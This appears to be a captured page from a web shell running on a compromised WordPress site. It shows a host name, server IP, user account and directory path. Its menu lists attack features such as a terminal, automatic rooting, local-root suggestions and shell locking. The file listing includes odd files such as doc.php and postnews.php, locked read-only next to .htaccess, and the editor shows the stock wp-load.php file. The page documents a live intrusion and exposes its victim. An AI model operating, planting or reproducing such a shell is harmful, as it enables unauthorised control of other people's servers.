Linux host2.homegym.sg 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64
Apache
Server IP : 159.223.38.192 & Your IP : 159.223.38.192
Domains : 20 Domain
User : eachadea
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
/
home /
eachadea /
public_html /
homegym.my /
articles /
Delete
Unzip
Name
Size
Permission
Date
Action
wp-admin
[ DIR ]
drwxr-xr-x
2025-10-31 01:03
wp-content
[ DIR ]
drwxr-xr-x
2025-10-31 01:03
wp-includes
[ DIR ]
drwxr-xr-x
2025-10-31 01:03
.htaccess
2
KB
-r--r--r--
2025-10-30 03:31
doc.php
12.56
KB
-rw-r--r--
2025-10-28 12:41
error_log
6.77
MB
-rw-r--r--
2019-06-20 13:58
favicon.ico
1.12
KB
-rw-r--r--
2019-06-20 13:58
index.php
397
B
-rw-r--r--
2019-06-20 13:58
license.txt
16.5
KB
-rw-r--r--
2019-06-20 13:58
postnews.php
5.74
KB
-r--r--r--
2025-10-30 03:31
readme.html
8.99
KB
-rw-r--r--
2019-06-20 13:58
sitemap.xml
3.31
KB
-rw-r--r--
2019-06-20 13:58
sitemap.xml.gz
869
B
-rw-r--r--
2019-06-20 13:58
wp-activate.php
4.24
KB
-rw-r--r--
2019-06-20 13:58
wp-app.php
39.3
KB
-rw-r--r--
2019-06-20 13:58
wp-atom.php
226
B
-rw-r--r--
2019-06-20 13:58
wp-blog-header.php
274
B
-rw-r--r--
2019-06-20 13:58
wp-comments-post.php
3.84
KB
-rw-r--r--
2019-06-20 13:58
wp-commentsrss2.php
244
B
-rw-r--r--
2019-06-20 13:58
wp-config-sample.php
3.1
KB
-rw-r--r--
2019-06-20 13:58
wp-config.php
3.39
KB
-rw-r--r--
2019-06-20 13:58
wp-cron.php
1.23
KB
-rw-r--r--
2019-06-20 13:58
wp-feed.php
246
B
-rw-r--r--
2019-06-20 13:58
wp-links-opml.php
1.95
KB
-rw-r--r--
2019-06-20 13:58
wp-load.php
2.47
KB
-rw-r--r--
2019-06-20 13:58
wp-login.php
26.95
KB
-rw-r--r--
2019-06-20 13:58
wp-mail.php
7.59
KB
-rw-r--r--
2019-06-20 13:58
wp-pass.php
494
B
-rw-r--r--
2019-06-20 13:58
wp-rdf.php
224
B
-rw-r--r--
2019-06-20 13:58
wp-register.php
334
B
-rw-r--r--
2019-06-20 13:58
wp-rss.php
224
B
-rw-r--r--
2019-06-20 13:58
wp-rss2.php
226
B
-rw-r--r--
2019-06-20 13:58
wp-settings.php
9.61
KB
-rw-r--r--
2019-06-20 13:58
wp-signup.php
18.21
KB
-rw-r--r--
2019-06-20 13:58
wp-trackback.php
3.62
KB
-rw-r--r--
2019-06-20 13:58
xmlrpc.php
3.19
KB
-rw-r--r--
2019-06-20 13:58
Save
Rename
<?php /** * Bootstrap file for setting the ABSPATH constant * and loading the wp-config.php file. The wp-config.php * file will then load the wp-settings.php file, which * will then set up the WordPress environment. * * If the wp-config.php file is not found then an error * will be displayed asking the visitor to set up the * wp-config.php file. * * Will also search for wp-config.php in WordPress' parent * directory to allow the WordPress directory to remain * untouched. * * @internal This file must be parsable by PHP4. * * @package WordPress */ /** Define ABSPATH as this files directory */ define( 'ABSPATH', dirname(__FILE__) . '/' ); error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR ); if ( file_exists( ABSPATH . 'wp-config.php') ) { /** The config file resides in ABSPATH */ require_once( ABSPATH . 'wp-config.php' ); } elseif ( file_exists( dirname(ABSPATH) . '/wp-config.php' ) && ! file_exists( dirname(ABSPATH) . '/wp-settings.php' ) ) { /** The config file resides one level above ABSPATH but is not part of another install*/ require_once( dirname(ABSPATH) . '/wp-config.php' ); } else { // A config file doesn't exist // Set a path for the link to the installer if ( strpos($_SERVER['PHP_SELF'], 'wp-admin') !== false ) $path = ''; else $path = 'wp-admin/'; require_once( ABSPATH . '/wp-includes/load.php' ); require_once( ABSPATH . '/wp-includes/version.php' ); define( 'WP_CONTENT_DIR', ABSPATH . 'wp-content' ); wp_check_php_mysql_versions(); // Die with an error message require_once( ABSPATH . '/wp-includes/class-wp-error.php' ); require_once( ABSPATH . '/wp-includes/functions.php' ); require_once( ABSPATH . '/wp-includes/plugin.php' ); $text_direction = /*WP_I18N_TEXT_DIRECTION*/'ltr'/*/WP_I18N_TEXT_DIRECTION*/; wp_die(sprintf(/*WP_I18N_NO_CONFIG*/"There doesn't seem to be a <code>wp-config.php</code> file. I need this before we can get started. Need more help? <a href='http://codex.wordpress.org/Editing_wp-config.php'>We got it</a>. You can create a <code>wp-config.php</code> file through a web interface, but this doesn't work for all server setups. The safest way is to manually create the file.</p><p><a href='%ssetup-config.php' class='button'>Create a Configuration File</a>"/*/WP_I18N_NO_CONFIG*/, $path), /*WP_I18N_ERROR_TITLE*/'WordPress › Error'/*/WP_I18N_ERROR_TITLE*/, array('text_direction' => $text_direction)); } ?>